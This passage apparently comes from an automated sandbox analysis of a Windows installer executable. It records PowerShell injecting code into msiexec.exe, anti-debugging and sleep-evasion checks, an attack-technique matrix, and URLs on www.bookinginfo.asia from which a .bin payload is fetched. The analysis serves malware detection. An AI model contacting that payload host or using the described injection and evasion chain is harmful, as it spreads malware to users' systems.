    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6925Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2752Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2032Thread sleep time: -4611686018427385s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exe TID: 5068Thread sleep count: 572 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exe TID: 5068Thread sleep time: -5720000s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
    Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
    Source: C:\Users\user\Desktop\3lH2EWD4wU.exeCode function: 0_2_004062A3 FindFirstFileA,FindClose,0_2_004062A3
    Source: C:\Users\user\Desktop\3lH2EWD4wU.exeCode function: 0_2_00405768 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405768
    Source: C:\Users\user\Desktop\3lH2EWD4wU.exeCode function: 0_2_004026FE FindFirstFileA,0_2_004026FE
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: msiexec.exe, 00000008.00000002.3452922453.0000000008A6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllJ
    Source: C:\Users\user\Desktop\3lH2EWD4wU.exeAPI call chain: ExitProcess graph end nodegraph_0-3300
    Source: C:\Users\user\Desktop\3lH2EWD4wU.exeAPI call chain: ExitProcess graph end nodegraph_0-3293
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 4060000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\3lH2EWD4wU.exeCode function: 0_2_0040320C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040320C
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Windows Management Instrumentation
    1
    DLL Side-Loading
    1
    Access Token Manipulation
    1
    Masquerading
    OS Credential Dumping111
    Security Software Discovery
    Remote Services1
    Archive Collected Data
    1
    Encrypted Channel
    Exfiltration Over Other Network Medium1
    System Shutdown/Reboot
    CredentialsDomainsDefault Accounts2
    PowerShell
    Boot or Logon Initialization Scripts311
    Process Injection
    31
    Virtualization/Sandbox Evasion
    LSASS Memory1
    Process Discovery
    Remote Desktop Protocol1
    Clipboard Data
    1
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
    DLL Side-Loading
    1
    Access Token Manipulation
    Security Account Manager31
    Virtualization/Sandbox Evasion
    SMB/Windows Admin SharesData from Network Shared Drive1
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
    Process Injection
    NTDS1
    Application Window Discovery
    Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Software Packing
    LSA Secrets2
    File and Directory Discovery
    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Side-Loading
    Cached Domain Credentials14
    System Information Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    3lH2EWD4wU.exe21%ReversingLabs
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd\3lH2EWD4wU.exe21%ReversingLabs
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://nsis.sf.net/NSIS_Error0%URL Reputationsafe
    http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    www.bookinginfo.asia
    unknown
    unknownfalse
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      https://www.bookinginfo.asia/Rmsiexec.exe, 00000008.00000002.3452922453.0000000008A6A000.00000004.00000020.00020000.00000000.sdmpfalse
        unknown
        http://nsis.sf.net/NSIS_Error3lH2EWD4wU.exe, 3lH2EWD4wU.exe.2.drfalse
        • URL Reputation: safe
        unknown
        https://www.bookinginfo.asia/pkeZmGiUuTK20.bin~Ymsiexec.exe, 00000008.00000002.3452922453.0000000008A6A000.00000004.00000020.00020000.00000000.sdmpfalse
          unknown
          https://www.bookinginfo.asia/mPmsiexec.exe, 00000008.00000002.3452922453.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpfalse
            unknown
            https://www.bookinginfo.asia/.asia:443)msiexec.exe, 00000008.00000002.3452922453.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpfalse
              unknown
              https://www.bookinginfo.asia/pkeZmGiUuTK20.binvmsiexec.exe, 00000008.00000002.3452922453.0000000008A6A000.00000004.00000020.00020000.00000000.sdmpfalse
                unknown
                https://www.bookinginfo.asia/rPmsiexec.exe, 00000008.00000002.3452922453.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpfalse
                  unknown
                  https://www.bookinginfo.asia/www.bookinginfo.asia5msiexec.exe, 00000008.00000002.3452922453.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpfalse
                    unknown
                    https://www.bookinginfo.asia/pkeZmGiUuTK20.bin;msiexec.exe, 00000008.00000002.3452922453.0000000008A6A000.00000004.00000020.00020000.00000000.sdmpfalse
                      unknown
                      https://www.bookinginfo.asia/nmsiexec.exe, 00000008.00000002.3452922453.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        https://www.bookinginfo.asia/Win64;msiexec.exe, 00000008.00000002.3452922453.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          https://www.bookinginfo.asia/:Pmsiexec.exe, 00000008.00000002.3452922453.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            https://www.bookinginfo.asia/pkeZmGiUuTK20.bin1msiexec.exe, 00000008.00000002.3452922453.0000000008A6A000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              http://nsis.sf.net/NSIS_ErrorError3lH2EWD4wU.exe, 3lH2EWD4wU.exe.2.drfalse
                              • URL Reputation: safe
                              unknown
                              https://www.bookinginfo.asia/www.bookinginfo.asiamsiexec.exe, 00000008.00000002.3452922453.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                https://www.bookinginfo.asia/dPmsiexec.exe, 00000008.00000002.3452922453.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  https://www.bookinginfo.asia/msiexec.exe, 00000008.00000002.3452922453.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3452922453.0000000008A6A000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    https://www.bookinginfo.asia/pkeZmGiUuTK20.bineYQmsiexec.exe, 00000008.00000002.3452922453.0000000008A6A000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      https://www.bookinginfo.asia/pkeZmGiUuTK20.binmsiexec.exe, 00000008.00000002.3452922453.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3464521069.0000000023AD0000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3452922453.0000000008A6A000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
